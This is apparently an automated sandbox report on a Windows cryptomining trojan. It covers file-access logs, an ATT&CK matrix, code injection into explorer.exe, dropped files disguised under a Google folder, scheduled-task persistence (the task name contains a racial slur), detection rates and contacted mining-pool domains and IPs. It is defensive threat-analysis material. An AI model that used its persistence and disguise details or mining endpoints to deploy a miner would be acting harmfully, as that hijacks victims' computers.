                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
                Windows Management Instrumentation                		1
                Windows Service                		1
                Windows Service                		12
                Masquerading                		OS Credential Dumping211
                Security Software Discovery                		Remote Services1
                Archive Collected Data                		1
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts1
                Command and Scripting Interpreter                		11
                DLL Side-Loading                		511
                Process Injection                		131
                Virtualization/Sandbox Evasion                		LSASS Memory1
                Process Discovery                		Remote Desktop ProtocolData from Removable Media1
                Non-Standard Port                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts1
                PowerShell                		Logon Script (Windows)11
                DLL Side-Loading                		511
                Process Injection                		Security Account Manager131
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive1
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                Deobfuscate/Decode Files or Information                		NTDS1
                Application Window Discovery                		Distributed Component Object ModelInput Capture1
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
                Obfuscated Files or Information                		LSA Secrets13
                System Information Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
                DLL Side-Loading                		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                File Deletion                		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1394131 Sample: SecuriteInfo.com.Win64.Evo-... Startdate: 18/02/2024 Architecture: WINDOWS Score: 100 39 monerooceans.stream 2->39 41 gulf.moneroocean.stream 2->41 51 Malicious sample detected (through community Yara rule) 2->51 53 Antivirus detection for URL or domain 2->53 55 Antivirus detection for dropped file 2->55 57 11 other signatures 2->57 7 m.exe 4 2->7         started        11 SecuriteInfo.com.Win64.Evo-gen.32403.24162.exe 2 2->11         started        13 m.exe 2->13         started        15 4 other processes 2->15 signatures3 process4 file5 31 C:\Windows\Temp\wbiwcikhpmwr.tmp, PE32+ 7->31 dropped 33 C:\Program Filesbehaviorgraphoogle\Libs\WR64.sys, PE32+ 7->33 dropped 59 Suspicious powershell command line found 7->59 61 Found strings related to Crypto-Mining 7->61 63 Injects code into the Windows Explorer (explorer.exe) 7->63 65 4 other signatures 7->65 17 explorer.exe 7->17         started        21 conhost.exe 7->21         started        35 C:\Program Files\MINA\m.exe, PE32+ 11->35 dropped 23 conhost.exe 15->23         started        25 conhost.exe 15->25         started        27 conhost.exe 15->27         started        29 conhost.exe 15->29         started        signatures6 process7 dnsIp8 37 monerooceans.stream 44.196.193.227, 10128, 49712 AMAZON-AESUS United States 17->37 43 System process connects to network (likely due to code injection or exploit) 17->43 45 Query firmware table information (likely to detect VMs) 17->45 47 Suspicious powershell command line found 21->47 signatures9 49 Detected Stratum mining protocol 37->49

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                SecuriteInfo.com.Win64.Evo-gen.32403.24162.exe53%ReversingLabsWin64.Trojan.Whisperer
                SecuriteInfo.com.Win64.Evo-gen.32403.24162.exe62%VirustotalBrowse
                SecuriteInfo.com.Win64.Evo-gen.32403.24162.exe100%AviraHEUR/AGEN.1329646
                SecuriteInfo.com.Win64.Evo-gen.32403.24162.exe100%Joe Sandbox ML

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Program Files\MINA\m.exe100%AviraHEUR/AGEN.1329646
                C:\Windows\Temp\wbiwcikhpmwr.tmp100%Joe Sandbox ML
                C:\Program Files\MINA\m.exe100%Joe Sandbox ML
                C:\Program Files\Google\Libs\WR64.sys5%ReversingLabs
                C:\Program Files\Google\Libs\WR64.sys1%VirustotalBrowse
                C:\Program Files\MINA\m.exe53%ReversingLabsWin64.Trojan.Whisperer
                C:\Program Files\MINA\m.exe62%VirustotalBrowse
                C:\Windows\Temp\wbiwcikhpmwr.tmp64%ReversingLabsWin64.PUA.DacicBitCoinMiner
                C:\Windows\Temp\wbiwcikhpmwr.tmp74%VirustotalBrowse

                Unpacked PE Files

                No Antivirus matches

                Domains

                SourceDetectionScannerLabelLink
                monerooceans.stream1%VirustotalBrowse

                URLs

                SourceDetectionScannerLabelLink
                http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
                http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
                https://contoso.com/0%URL Reputationsafe
                https://contoso.com/License0%URL Reputationsafe
                https://contoso.com/License0%URL Reputationsafe
                https://contoso.com/Icon0%URL Reputationsafe
                https://xmrig.com/docs/algorithms0%URL Reputationsafe
                http://www.microsoft.co0%Avira URL Cloudsafe
                http://www.microsoft.co1%VirustotalBrowse

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                monerooceans.stream
                		44.196.193.227
                		truetrueunknown
                gulf.moneroocean.stream
                		unknown
                		unknownfalse
                  		high

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.2076905736.000002AF2D190000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000007.00000002.2122566660.000001F7BE869000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000007.00000002.2122566660.000001F7BE869000.00000004.00000800.00020000.00000000.sdmptrue
                      • URL Reputation: malware
                      • URL Reputation: malware
                      		unknown
                      http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000002.00000002.2059585880.000002AF1D349000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2122566660.000001F7BE869000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000007.00000002.2122566660.000001F7BE869000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000002.00000002.2059585880.000002AF1D349000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2122566660.000001F7BE869000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://contoso.com/powershell.exe, 00000002.00000002.2076905736.000002AF2D190000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.2076905736.000002AF2D190000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://www.microsoft.copowershell.exe, 00000002.00000002.2081964848.000002AF357A3000.00000004.00000020.00020000.00000000.sdmpfalse
                              • 1%, Virustotal, Browse
                              • Avira URL Cloud: safe
                              		unknown
                              https://contoso.com/Licensepowershell.exe, 00000002.00000002.2076905736.000002AF2D190000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              https://contoso.com/Iconpowershell.exe, 00000002.00000002.2076905736.000002AF2D190000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://xmrig.com/docs/algorithmsm.exe, 00000006.00000002.2224945388.00007FF7C880B000.00000004.00000001.01000000.00000008.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://aka.ms/pscore68powershell.exe, 00000002.00000002.2059585880.000002AF1D121000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.2059585880.000002AF1D121000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://github.com/Pester/Pesterpowershell.exe, 00000007.00000002.2122566660.000001F7BE869000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high

                                    World Map of Contacted IPs

                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs

                                    Public IPs

                                    IPDomainCountryFlagASNASN NameMalicious
                                    44.196.193.227
                                    		monerooceans.streamUnited States
                                    		14618AMAZON-AESUStrue

                                    General Information

                                    Joe Sandbox version:40.0.0 Tourmaline
                                    Analysis ID:1394131
                                    Start date and time:2024-02-18 19:38:07 +01:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 9m 29s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                    Number of analysed new started processes analysed:20
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:SecuriteInfo.com.Win64.Evo-gen.32403.24162.exe
                                    Detection:MAL
                                    Classification:mal100.evad.mine.winEXE@21/21@1/1
                                    EGA Information:
                                    • Successful, ratio: 20%
                                    HCA Information:Failed
                                    Cookbook Comments:
                                    • Found application associated with file extension: .exe
                                    • Override analysis time to 240000 for current running targets taking high CPU consumption

                                    Warnings

                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, schtasks.exe
                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                    • Execution Graph export aborted for target SecuriteInfo.com.Win64.Evo-gen.32403.24162.exe, PID 5044 because it is empty
                                    • Execution Graph export aborted for target m.exe, PID 2724 because it is empty
                                    • Execution Graph export aborted for target powershell.exe, PID 1412 because it is empty
                                    • Execution Graph export aborted for target powershell.exe, PID 4296 because it is empty
                                    • Not all processes where analyzed, report is missing behavior information
                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                    • Report size getting too big, too many NtCreateKey calls found.
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtQueryAttributesFile calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                    • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                    • Report size getting too big, too many NtSetInformationFile calls found.

                                    Simulations

                                    Behavior and APIs

                                    TimeTypeDescription
                                    19:38:55API Interceptor1x Sleep call for process: SecuriteInfo.com.Win64.Evo-gen.32403.24162.exe modified
                                    19:38:57API Interceptor77x Sleep call for process: powershell.exe modified
                                    19:39:00Task SchedulerRun new task: MINEINEYNIGGA path: C:\Program Files\MINA\m.exe
                                    19:39:02API Interceptor2x Sleep call for process: m.exe modified
                                    19:39:15API Interceptor1778708x Sleep call for process: conhost.exe modified

                                    Joe Sandbox View / Context

                                    IPs

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    44.196.193.227GoogleCrashHandler.exeGet hashmaliciousXmrigBrowse
                                      yljlbesdmoas.exeGet hashmaliciousXmrigBrowse
                                        BraveCrashHandler.exeGet hashmaliciousNanominer, XmrigBrowse
                                          GoogleCrashHandler.exeGet hashmaliciousXmrigBrowse
                                            SecuriteInfo.com.W64.Rozena.HA.gen.Eldorado.22978.31544.exeGet hashmaliciousXmrigBrowse

                                              Domains

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              monerooceans.streamGoogleCrashHandler.exeGet hashmaliciousXmrigBrowse
                                              • 44.196.193.227
                                              yljlbesdmoas.exeGet hashmaliciousXmrigBrowse
                                              • 44.196.193.227
                                              GoogleCrashHandler.exeGet hashmaliciousXmrigBrowse
                                              • 44.196.193.227
                                              GoogleCrashHandler.exeGet hashmaliciousXmrigBrowse
                                              • 44.224.209.130
                                              vHAgn4Dx00.exeGet hashmaliciousAveMaria, UACMe, XmrigBrowse
                                              • 44.224.209.130
                                              vABMEuk0Ie.exeGet hashmaliciousXmrigBrowse
                                              • 44.196.193.227
                                              SecuriteInfo.com.W64.Rozena.HA.gen.Eldorado.22978.31544.exeGet hashmaliciousXmrigBrowse
                                              • 44.196.193.227
                                              jJ4UO2hOfp.exeGet hashmaliciousXmrigBrowse
                                              • 44.224.209.130
                                              J2YYVJDL1f.exeGet hashmaliciousXmrigBrowse
                                              • 44.224.209.130
                                              Go4djq29iE.exeGet hashmaliciousXmrigBrowse
                                              • 44.224.209.130

                                              ASNs

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              AMAZON-AESUSMTHJdsxrlR.elfGet hashmaliciousMiraiBrowse
                                              • 44.205.36.178
                                              dq0s72MFq3.elfGet hashmaliciousMiraiBrowse
                                              • 44.201.61.230
                                              WAFYMiJoIs.elfGet hashmaliciousMiraiBrowse
                                              • 99.77.128.120
                                              uOwBMTUHGg.elfGet hashmaliciousMiraiBrowse
                                              • 44.204.97.2
                                              CBo4R8XS5k.elfGet hashmaliciousMiraiBrowse
                                              • 54.19.184.141
                                              49nLHo99Hf.elfGet hashmaliciousMiraiBrowse
                                              • 100.29.92.171
                                              L5dJXUt9Sz.elfGet hashmaliciousMiraiBrowse
                                              • 54.8.18.195
                                              i6mpMiwNMm.elfGet hashmaliciousMiraiBrowse
